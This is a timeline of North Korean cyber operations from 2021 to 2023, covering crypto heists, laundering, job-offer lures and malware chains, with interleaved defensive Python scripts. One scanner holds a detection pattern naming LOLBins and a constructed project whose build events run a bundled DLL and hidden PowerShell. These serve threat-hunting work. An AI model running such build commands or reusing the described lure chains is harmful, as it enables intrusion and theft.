  • In 2021, only 20% of the stolen funds were Bitcoin, whereas 22% were either ERC-20 tokens or altcoins. And for the first time ever, Ether accounted for a majority of the funds stolen at 58%.
  • The growing variety of cryptocurrencies stolen has necessarily increased the complexity of DPRK’s cryptocurrency laundering operation. Today, DPRK’s typical laundering process is as follows:
  • More than 65% of DPRK’s stolen funds were laundered through mixers this year, up from 42% in 2020 and 21% in 2019, suggesting that these threat actors have taken a more cautious approach with each passing year.
  • Why mixers? DPRK is a systematic money launderer, and their use of multiple mixers is a calculated attempt to obscure the origins of their ill-gotten cryptocurrencies while offramping into fiat. Why DeFi? DeFi platforms like DEXs provide liquidity for a wide range of ERC-20 tokens and altcoins that may not otherwise be convertible into cash. When DPRK swaps these coins for ETH or BTC they become much more liquid, and a larger variety of mixers and exchanges become usable. What’s more, DeFi platforms don’t take custody of user funds and many do not collect know-your-customer (KYC) information, meaning that cybercriminals can use these platforms without having their assets frozen or their
  • DPRK’s stolen fund stockpile: $170M worth of old, unlaundered cryptocurrency holdings. Chainalysis has identified $170M in current balances—representing the stolen funds of 49 separate hacks spanning from 2017 to 2021—that are controlled by North Korea but have yet to be laundered through services. The ten largest balances by dollar value are listed below.
  • Of DPRK’s total holdings, roughly $35M came from attacks in 2020 and 2021. By contrast, more than $55M came from attacks carried out in 2016—meaning that DPRK has massive unlaundered balances as much as six years old.

Google TAG report on a new campaign targeting security researchers

  • Date:: 2021-01-25
  • Government-backed entity based in North Korea; targeting carried out over social media.
  • the actors established a research blog and multiple Twitter profiles to interact with potential targets. They've used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control.
  • Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
  • After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains. An example of the VS Build Event can be seen in the image below.
  • In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
  • These actors have used multiple platforms to communicate with potential targets, including Twitter, LinkedIn, Telegram, Discord, Keybase and email
  • https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
  • https://apnews.com/article/malware-media-north-korea-social-media-south-korea-7dc8a5a9a3576005a615524d1ba439aa
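The Visual Studio lure above works because MSBuild happily runs whatever command a project's build events contain, so "open the project and build it" is enough to execute an attacker's DLL. A reviewer handed a third-party research project can scan it before building. The script below is an added example, not Google TAG's tooling, and the sample `.vcxproj` embedded in it is constructed for illustration: the `helper.dll` and `setup.ps1` names are hypothetical stand-ins, not the artefacts from the campaign.

```python
"""Scan a Visual Studio / MSBuild project for build-time commands that run
something other than the toolchain (LOLBins, script hosts, downloaders).
Added example; constructed sample project, not TAG's artefact."""
import re
import xml.etree.ElementTree as ET

MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"

# Elements whose <Command> child MSBuild executes as part of a build.
EVENT_TAGS = {"PreBuildEvent", "PreLinkEvent", "PostBuildEvent",
              "CustomBuild", "CustomBuildStep"}

# Interpreters and LOLBins with no business in a vulnerability-research build.
SUSPICIOUS = re.compile(
    r"\b(rundll32|regsvr32|mshta|wscript|cscript|powershell|pwsh|"
    r"certutil|bitsadmin|msiexec|curl)(\.exe)?\b",
    re.IGNORECASE,
)


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def find_build_commands(project_xml: str):
    """Return (kind, command) for every command MSBuild would execute."""
    root = ET.fromstring(project_xml)
    found = []
    for el in root.iter():            # document order
        name = _local(el.tag)
        if name in EVENT_TAGS:
            for child in el:
                if _local(child.tag) == "Command" and child.text and child.text.strip():
                    found.append((name, child.text.strip()))
        elif name == "Exec" and el.get("Command"):
            # <Exec Command="..."/> inside a <Target> runs at build time too.
            found.append(("Exec", el.get("Command").strip()))
    return found


def flag_suspicious(commands):
    """Keep only commands invoking a binary from SUSPICIOUS; report which one."""
    hits = []
    for kind, cmd in commands:
        m = SUSPICIOUS.search(cmd)
        if m:
            hits.append((kind, cmd, m.group(1).lower()))
    return hits


# Constructed sample project: one benign post-build copy, one pre-build event
# that loads a DLL shipped with the project, and one hidden PowerShell target.
SAMPLE_VCXPROJ = f"""<Project DefaultTargets="Build" xmlns="{MSBUILD_NS}">
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile><WarningLevel>Level3</WarningLevel></ClCompile>
    <PreBuildEvent>
      <Command>rundll32.exe $(ProjectDir)helper.dll,Entry</Command>
    </PreBuildEvent>
    <PostBuildEvent>
      <Command>copy "$(TargetPath)" "$(SolutionDir)bin\\"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="AfterBuild">
    <Exec Command="powershell -nop -w hidden -File $(ProjectDir)setup.ps1" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for kind, cmd, binary in flag_suspicious(find_build_commands(SAMPLE_VCXPROJ)):
        print(f"[{kind}] runs {binary}: {cmd}")
```

Run it over every `*.vcxproj`, `*.csproj` and `*.targets` file in a received archive before opening it in the IDE; the `Exec` handling matters because `Condition` attributes and custom targets are where a careful attacker hides the call rather than in the obvious `PreBuildEvent`.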

Microsoft: ZINC attacks against security researchers

Daily NK: Kim Jong Un is directly handling results of new COVID-19 hacking organization's work

FBI + CISA: Report on Operation AppleJeus - Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale

Ghaleb Alaumary + Ramon Abbas (Hushpuppi) named in ‘North Korean-perpetrated cyber-enabled’ heist

  • Date:: 2021-02-20
  • https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and
  • Nigerian Instagram celebrity Ramon Abbas, also known as Hushpuppi, has been named in another case in the United States, this time involving North Korean hackers.
  • The United States Justice Department said Hushpuppi conspired with Canadian-American citizen Ghaleb Alaumary and others to launder funds from a North Korean-perpetrated cyber-enabled heist of a Maltese bank in February 2019.
  • Hushpuppi is currently facing separate trial for conspiring “to launder hundreds of millions of dollars from BEC frauds and other scams.”
  • “The affidavit also alleges that Abbas conspired to launder funds stolen in a $14.7 million cyber-heist from a foreign financial institution in February 2019, in which the stolen money was sent to bank accounts around the world.
  • Federal prosecutors today also unsealed a charge against Ghaleb Alaumary, 37, of Mississauga, Ontario, Canada, for his role as a money launderer for the North Korean conspiracy, among other criminal schemes. Alaumary agreed to plead guilty to the charge, which was filed in the U.S. District Court in Los Angeles on Nov. 17, 2020. Alaumary was a prolific money launderer for hackers engaged in ATM cash-out schemes, cyber-enabled bank heists, business email compromise (BEC) schemes, and other online fraud schemes. Alaumary is also being prosecuted for his involvement in a separate BEC scheme by the U.S. Attorney’s Office for the Southern District of Georgia.
  • With respect to the North Korean co-conspirators’ activities, Alaumary organized teams of co-conspirators in the United States and Canada to launder millions of dollars obtained through ATM cash-out operations, including from BankIslami and a bank in India in 2018.
  • Alaumary also conspired with Ramon Olorunwa Abbas, aka “Ray Hushpuppi,” and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019. Last summer, the U.S. Attorney’s Office in Los Angeles charged Abbas in a separate case alleging that he conspired to launder hundreds of millions of dollars from BEC frauds and other scams.

Mun Chol-myon

A NEW NFT&DeFi TECH (PROTECTED).docx

Lazarus BTC Changer

AppleJeus: Analysis of North Korea’s Cryptocurrency Malware

The Incredible Rise of North Korea’s Hacking Army - Lazarus group’s criminal enterprises including cryptocurrency exchange heists and ransomware attacks

ClearSky: Attributing CryptoCore Attacks Against Crypto Exchanges to Lazarus

ClearSky: Report on the Crypto Core APT group attributing it to the North Korean Lazarus APT

Andariel evolves to target South Korea with ransomware

  • Date:: 2021-06-15
  • https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/
  • In April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection scheme and an unfamiliar payload. While we were doing our research into these findings, Malwarebytes published a nice report with technical details about the same series of attacks, which they attributed to the Lazarus group. After a deep analysis, we came to a more precise conclusion: the Andariel group was behind these attacks. Andariel was designated by the Korean Financial Security Institute as a sub-group of Lazarus.
  • Our attribution is based on the code overlaps between the second stage payload in this campaign and previous malware from the Andariel group. Apart from the code similarity, we found an additional connection with the Andariel group. Each threat actor has characteristics when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.
  • Mid-2020 onwards, they've leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim getting infected with custom ransomware. It adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.

HushPuppi - The Fall Of The Billionaire Gucci Master

Rapid Change of Stablecoin (Protected).docx secure.azureword[.]com Z Venture Capital Presentation(Protected).docx

Ghaleb Alaumary sentenced to 11 years in jail for laundering funds such as those coming from a banking heist by North Korean actors


2022

CVE-2022-0609 Earliest sighting of this particular kit

  • Date:: 2022-01-04

Kaspersky Report: SnatchCrypto Campaign

North Korean Hackers Have Prolific Year as Their Unlaundered Cryptocurrency Holdings Reach All-time High

North Korea Hacked Him. So He Took Down Its Internet

CVE-2022-0609 reported by Google TAG's Clément Lecigne - use-after-free in Animation

  • Date:: 2022-02-10
  • TAG discovered two distinct North Korean attacker groups exploiting the remote code execution vulnerability
  • Operation Dream Job + Operation AppleJeus

CVE-2022-0609 Chrome Update Released - use-after-free in Animation

  • Date:: 2022-02-14

What Wicked Webs We Un-weave

CVE-2022-1096 reported by an anonymous researcher - type confusion in V8

  • Date:: 2022-03-23

Mandiant - Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations

  • Date:: 2022-03-23

CVE-2022-0609: Google posts update about the zero-day - Operation Dream Job and Operation AppleJeus

  • Date:: 2022-03-24
  • Campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.
  • Targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors. The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities. The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.
  • Operation AppleJeus targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit. This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors. In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.
  • The campaign began with phishing emails purporting to come from recruiters at Disney, Google and Oracle, offering false employment opportunities. The emails contained links to spoofed job-search websites such as Indeed and ZipRecruiter. Targets who clicked the malicious URLs were served a drive-by exploit kit for CVE-2022-0609 through hidden iframes embedded in a variety of websites. The kit first fingerprints the target device, collecting details such as user-agent and screen resolution, and only then serves the Chrome remote code execution exploit; a successful RCE then requests a separate sandbox-escape stage to get out of the renderer sandbox onto the system.
  • https://blog.google/threat-analysis-group/countering-threats-north-korea/

CVE-2022-1096 Chrome Update Released - type confusion in V8

  • Date:: 2022-03-25

Lazarus Trojanized DeFi app for delivering malware

APT Group Lazarus Distributing Korean Phishing Lures to Feel Out Cryptocurrency Users

  • Date:: 2022-04-12
  • In this attack, Lazarus built a type of decoy document containing an “AhnLab ” icon and prompt information. The prompts for these documents vary, but the common goal is to trick victims into enabling Office’s document editing capabilities. AhnLab is a cyber security vendor with its headquarters in South Korea. Lazarus uses the name to increase the persuasiveness of the decoy document.
  • Another type of decoy document contains Binance icons and related tips. Binance is a cryptocurrency trading platform.

CVE-2022-1364 Reported by Google TAG's Clément Lecigne

  • Date:: 2022-04-13
  • Type Confusion, V8 Engine

CVE-2022-1364 Chrome Update Released, everyone told to update urgently

Ronin Bridge Hack Attributed to Lazarus Group, addresses added to OFAC list

Tornado Cash uses Chainalysis Oracle to block OFAC addresses (from frontend)

TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies

How the DPRK became a hacking powerhouse and why it loves crypto

Guidance on the DPRK IT Workers

Insight: Crypto crash threatens North Korea's stolen funds as it ramps up weapons tests

Here’s how North Korean operatives are trying to infiltrate US crypto firms

AppleSeed Disguised as Purchase Order and Request Form Being Distributed

US disrupts North Korean hackers that targeted hospitals

AppleSeed Being Distributed to Maintenance Company of Military Bases

Proofpoint: Macro-Blocking & How Threat Actors Are Adapting

Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)

U.S. Treasury Sanctions Notorious Virtual Currency Mixer Tornado Cash

Suspected Tornado Cash developer arrested in Netherlands

Andariel deploys DTrack and Maui ransomware

UNC4034 Spreading Trojanized Versions of PuTTY Client Application - DPRK Job Opportunity Phishing via WhatsApp

Lazarus ‘Operation In(ter)ception’ Targets macOS Users Dreaming of Jobs in Crypto

ESET: Lazarus & BYOVD: Evil To The Windows Core

Microsoft: ZINC weaponizing open-source software

  • Date:: 2022-09-29
  • https://microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
  • ZINC, Diamond Sleet
  • Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads.
  • Weaponized a wide range of open-source software for these attacks, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and the muPDF/Subliminal Recording software installer
  • Observed attempting to move laterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous organizations since June 2022.
  • The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant earlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions.

Analysis Report on Lazarus Group's Rootkit Malware That Uses BYOVD

U.S. targets North Korean fuel procurement network for breaching UN sanctions

Lazarus Group Uses the DLL Side-Loading Technique (mi.dll)

With more than $3B already stolen, 2022 is on pace to become crypto’s ‘biggest year for hacking on record’

Malicious app suspected to be created by a North Korean hacker organization aimed at stealing cryptocurrency discovered

Distribute AppleSeed to companies related to nuclear power plants

Lazarus Group had been observed targeting public and private sector research organizations, medical research and energy sectors, as well as their supply chains. This campaign, dubbed “No Pineapple”, focused on intelligence-gathering, starting with an attack on a company that was exploited through CVE-2022-27925 (remote code execution) and CVE-2022-37042 (authentication bypass) – two vulnerabilities affecting the digital collaboration

Volexity: ₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware

Microsoft: DEV-0139 launches targeted attacks against the cryptocurrency industry

  • Date:: 2022-12-06
  • https://microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/
  • Citrine Sleet, OKX Fee Adjustment
  • We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
  • After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
  • A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
  • The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
  • The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
  • The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.
  • Telegram Group: <NameOfTheTargetedCompany> <> OKX Fee Adjustment
  • OKX Binance & Huobi VIP fee comparision.xls - abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0
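The DEV-0139 chain above hides its payloads inside a file that looks like an image: a PNG that carries three PE images (a legitimate `logagent.exe`, a proxy `wsock32.dll` to be sideloaded by it, and the XOR-encoded backdoor). The page does not say how the executables are packed into the PNG, so the added example below assumes the simplest form, a well-formed carrier image with the PE images appended after the `IEND` chunk, and also scans the whole buffer for `MZ`/`PE\0\0` header pairs so it works regardless of where they sit. It is not Microsoft's tooling; the sample file it builds is constructed in code, and the `logagent`, `wsock32` and `backdoor` tags are labels mirroring the page's description, not real binaries.

```python
"""Detect PE images hidden in, or appended to, a PNG carrier file.
Added example with a constructed sample; not the DEV-0139 artefact."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_end_offset(data: bytes):
    """Walk the chunk list, verifying each CRC; return the offset just past
    IEND, or None if the buffer is not a well-formed PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 12 + length            # length + type + data + crc
        if chunk_end > len(data):
            return None
        crc = struct.unpack(">I", data[chunk_end - 4:chunk_end])[0]
        if zlib.crc32(data[pos + 4:chunk_end - 4]) & 0xFFFFFFFF != crc:
            return None
        pos = chunk_end
        if ctype == b"IEND":
            return pos
    return None


def find_pe_headers(data: bytes):
    """Offsets of every 'MZ' whose e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    hits, start = [], 0
    while True:
        mz = data.find(b"MZ", start)
        if mz < 0 or mz + 0x40 > len(data):
            break
        e_lfanew = struct.unpack_from("<I", data, mz + 0x3C)[0]
        pe = mz + e_lfanew
        if e_lfanew >= 0x40 and pe + 4 <= len(data) and data[pe:pe + 4] == b"PE\x00\x00":
            hits.append(mz)
        start = mz + 2
    return hits


def analyze_carrier(data: bytes) -> dict:
    """Summarise what a downloaded 'image' really contains."""
    end = png_end_offset(data)
    return {
        "valid_png": end is not None,
        "trailing_bytes": (len(data) - end) if end is not None else None,
        "pe_offsets": find_pe_headers(data),
    }


# ---- constructed sample carrier ------------------------------------------
def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF   # PNG CRC covers type + data
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def _fake_pe(tag: bytes) -> bytes:
    """Minimal MZ stub plus PE signature: recognisable, not executable."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x80)       # e_lfanew -> 0x80
    return bytes(hdr) + b"\x00" * (0x80 - len(hdr)) + b"PE\x00\x00" + tag + b"\x00" * 64


def build_sample_png() -> bytes:
    """A valid 1x1 RGB PNG with three fake PE images appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")     # filter byte + one RGB pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    return png + _fake_pe(b"logagent") + _fake_pe(b"wsock32") + _fake_pe(b"backdoor")


if __name__ == "__main__":
    print(analyze_carrier(build_sample_png()))
```

Any non-zero `trailing_bytes` on a downloaded image is worth a look on its own; a hit in `pe_offsets` is a dropper. The CRC check matters because a decoder that tolerates bad CRCs would still display the image, so "it opens fine" proves nothing.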

Seoul: North Korean hackers stole $1.2B in virtual assets

SlowMist: Investigation of North Korean APT’s Large-Scale Phishing Attack on NFT Users


2023

Lazarus - The suspected APT-C-26 (Lazarus) organization conducts attack activity analysis through cryptocurrency wallet promotion information

Kimsuky - North Korea’s Cryptocurrency Craze and its Impact on U.S. Policy

Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)

FBI: Confirms Lazarus Group Cyber Actors Responsible for Harmony's Horizon Bridge Currency Theft

Proofpoint: TA444 - The APT Startup Aimed at Acquisition (of Your Funds)

CISA: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

  • Date:: 2023-02-09
  • https://cisa.gov/news-events/cybersecurity-advisories/aa23-040a
  • 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk
  • 16ENLdHbnmDcEV8iqN4vuyZHa7sSdYRh76
  • 16sYqXancDDiijcuruZecCkdBDwDf4vSEC
  • 1FX4W9rrG4F3Uc7gJ18GCwGab8XuW8Ajy2
  • 1J8spy62o7z2AjQxoUpiCGnBh5cRWKVWJC
  • 1KCwfCUgnSy3pzNX7U1i5NwFzRtth4bRBc
  • 1KmWW6LgdgykBBrSXrFu9kdoHz95Fe9kQF
  • 1MTHBCrBKYEthfa16zo9kabt4f9jMJz8Rm
  • 1N6JphHFaYmYaokS5xH31Z67bvk4ykd9CP
  • 1NqihEqYaQaWiZkPVdSMiTbt7dTy1LMxgX
  • bc1q3wzxvu8yhs8h7mlkmf7277wyklkah9k4sm9anu
  • bc1q498fn0gauj2kkjsg35mlwk2cnxhaqlj7hkh8xy
  • bc1q6024d73h48fnhwswhwt3hqz2lzw6x99q0nulm4
  • bc1q6qfkt06xmrpclht3acmq00p7zyy0ejydu89zwv
  • bc1q7qry3lsrphmnw3exs7tkwzpvzjcxs942aq8n0y
  • bc1q80vc4yjgg6umedkut3e9mhehxl4q4dcjjyzh59
  • bc1q8t69gpxsezdcr8w6tfzp3jeptq4tcp2g9d0mwy
  • bc1q8xyt4jxhw7mgqpwd6qfdjyxgvjeuz57jxrvgk9
  • bc1q9h7yj79sqm4t536q0fdn7n4y2atsvvl22m28ep
  • bc1qagaayd57vr25dlqgk7f00nhz9qepqgnlnt4upu
  • bc1qavrtge4p7dmcrnvhlvuhaarx8rek76wxyk7dgg
  • bc1qcmlcxfsy0zlqhh72jvvc4rh7hvwhx6scp27na0
  • bc1qcp557vltuu3qc6pk3ld0ayagrxuf2thp3pjzpe
  • bc1qcywkd7zqlwmjy36c46dpf8cq6ts6wgkjx0u7cn
  • bc1qg3zlxxhhcvt6hkuhmqml8y9pas76cajcu9ltdl
  • bc1qhfmqstxp3yp9muvuz29wk77vjtdyrkff4nrxpu
  • bc1qj6y72rk039mqpgtcy7mwjd3eum6cx6027ndgmd
  • bc1qk0saaw7p0wrwla6u7tfjlxrutlgrwnudzx9tyw
  • bc1ql8wsflrjf9zlusauynzjm83mupq6c9jz9vnqxg
  • bc1qlqgu2l2kms5338zuc95kxavctzyy0v705tpvyc
  • bc1qmge6a7sp659exnx78zhm9zgrw88n6un0rl9trs
  • bc1qn7a3g23nzpuytchyyteyhkcse84cnylznl3j32
  • bc1qnh8scrvuqvlzmzgw7eesyrmtes9c5m78duetf3
  • bc1qnz4udqkumjghnm2a3zt0w3ep8fwdcyv3krr3jq
  • bc1qu0pvfmtxawm8s99lcjvxapungtsmkvwyvak6cs
  • bc1qunqnjdlvqkjuhtclfp8kzkjpvdz9qnk898xczp
  • bc1quvnaxnpqlzq3mdhfddh35j7e7ufxh3gpc56hca
  • bc1qwdvexlyvg3mqvqw7g6l09qup0qew80wjj9jh7x
  • bc1qx60ec3nfd5yhsyyxkzkpts54w970yxj84zrdck
  • bc1qxrpevck3pq1yzrx2pq2rkvkvy0jnm56nzjv6pw
  • bc1qy6su7vrh7ts5ng2628escmhr98msmzg62ez2sp
  • bc1qyue2pgjk09ps7qvfs559k8kee3jkcw4p4vdp57
  • LZ1VNJfn6mWjPzkCyoBvqWaBZYXAwn135
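An address list like the one above usually goes straight into a blocklist or a transaction-monitoring rule, and a single dropped or transposed character silently turns an entry into a string that will never match anything. Both encodings in the list carry checksums, so the list can be validated before it is loaded: Base58Check (the `1...`/`L...` entries, a version byte plus 4 bytes of double-SHA256) and Bech32/Bech32m (the `bc1q...` entries, per BIP173/BIP350). The code below is an added example, not CISA's; the addresses in its test are the BIP173 test vector and the Bitcoin wiki example address, not entries from the advisory. Which coin an `L` version byte belongs to is left to the caller.

```python
"""Checksum-validate cryptocurrency-address IOCs before loading them into a
blocklist. Added example (Base58Check + BIP173/BIP350 Bech32), not CISA code."""
import hashlib

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
BECH32M_CONST = 0x2BC830A3


def _b58_check(addr: str):
    """Return the version byte if the 4-byte double-SHA256 checksum holds, else None."""
    n = 0
    for c in addr:
        if c not in B58_ALPHABET:
            return None
        n = n * 58 + B58_ALPHABET.index(c)
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    raw = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + raw   # leading '1' = 0x00
    if len(raw) != 25:
        return None
    payload, checksum = raw[:-4], raw[-4:]
    if hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] != checksum:
        return None
    return payload[0]


def _polymod(values):
    """BIP173 checksum polynomial."""
    gen = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            chk ^= gen[i] if (top >> i) & 1 else 0
    return chk


def _bech32_check(addr: str):
    """Return (hrp, witness_version, program_len) if the Bech32/Bech32m checksum holds."""
    if addr.lower() != addr and addr.upper() != addr:
        return None                                  # mixed case is forbidden
    a = addr.lower()
    sep = a.rfind("1")
    if sep < 1 or sep + 7 > len(a) or len(a) > 90:
        return None
    hrp, body = a[:sep], a[sep + 1:]
    if any(c not in BECH32_CHARSET for c in body):
        return None
    data = [BECH32_CHARSET.index(c) for c in body]
    expanded = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    version = data[0]
    expected = 1 if version == 0 else BECH32M_CONST    # v0 = Bech32, v1+ = Bech32m
    if _polymod(expanded + data) != expected:
        return None
    acc = bits = 0
    program = []
    for v in data[1:-6]:                               # regroup 5-bit -> 8-bit
        acc = (acc << 5) | v
        bits += 5
        while bits >= 8:
            bits -= 8
            program.append((acc >> bits) & 0xFF)
    if bits >= 5 or (acc << (8 - bits)) & 0xFF:        # leftover must be zero padding
        return None
    if version == 0 and len(program) not in (20, 32):  # P2WPKH / P2WSH only
        return None
    return hrp, version, len(program)


def classify_address(addr: str) -> dict:
    """Describe one IOC: encoding scheme, checksum validity, decoded fields."""
    addr = addr.strip()
    version = _b58_check(addr)
    if version is not None:
        return {"address": addr, "scheme": "base58check", "valid": True,
                "version_byte": version}
    r = _bech32_check(addr)
    if r is not None:
        return {"address": addr, "scheme": "bech32", "valid": True,
                "hrp": r[0], "witness_version": r[1], "program_len": r[2]}
    return {"address": addr, "scheme": "unknown", "valid": False}


def validate_ioc_list(addresses):
    """Split a list into checksum-valid entries and entries to re-check by hand."""
    results = [classify_address(a) for a in addresses]
    return ([r for r in results if r["valid"]], [r for r in results if not r["valid"]])
```

Feed the advisory's list to `validate_ioc_list`; anything that lands in the second list is either a transcription error in the copy you have or an address of a type this validator does not understand, and in both cases it should be checked against the original advisory rather than loaded as-is.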

Kimsuky: Malware Disguised as Normal Documents

  • Date:: 2023-02-15
  • Same tactics as in Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers); in this case, the threat actor used an image that prompts users to execute the macro.
  • https://asec.ahnlab.com/en/47585/

Lazarus Anti-Forensic Techniques

  • Date:: 2023-02-23
  • The Lazarus Group carried out anti-forensics to conceal their malicious activities. They transmitted a configuration file with C2 information and a PE file that communicates with the C2 server in encrypted forms to evade detection by security products. The encrypted files operate after being decrypted onto the memory by the loader file. They then receive additional files from the C2 and perform malicious actions.
  • https://asec.ahnlab.com/en/48223/

Økokrim has seized almost NOK 60 million in cryptocurrency. This is the largest amount of cryptocurrency ever seized by the Norwegian police

WinorDLL64 - backdoor from the vast Lazarus arsenal

Mandiant: Stealing the LIGHTSHOW - LIGHTSHIFT and LIGHTSHOW - North Korea's UNC2970

Kimsuky - CHM Malware Disguised as North Korea-related Questionnaire (Kimsuky)

Kimsuky - OneNote Malware Disguised as Compensation Form

Kimsuky - Distributes Malware Disguised as Profile Template (GitHub)

Inside the international sting operation to catch North Korean crypto hackers

Lazarus DeathNote campaign

Google TAG - How we’re protecting users from government-backed attacks from North Korea

Jamf - BlueNoroff APT group targets macOS with ‘RustBucket’ Malware

North Korean Foreign Trade Bank Representative Charged in Crypto Laundering Conspiracies

Half of North Korean missile program funded by cyberattacks and crypto theft, White House says

JPCERT/CC Eyes: Attack Trends Related to DangerousPassword

  • Date:: 2023-05-12
  • https://blogs.jpcert.or.jp/en/2023/05/dangerouspassword.html
  • DangerousPassword, CryptoMimic, SnatchCrypto
  • Attacks by sending malicious CHM files from LinkedIn
  • Attacks using OneNote files
  • Attacks using virtual hard disk files
  • Attacks targeting macOS:
  • An AppleScript (main.scpt) is contained; it downloads an unauthorized application using the curl command and then executes it:
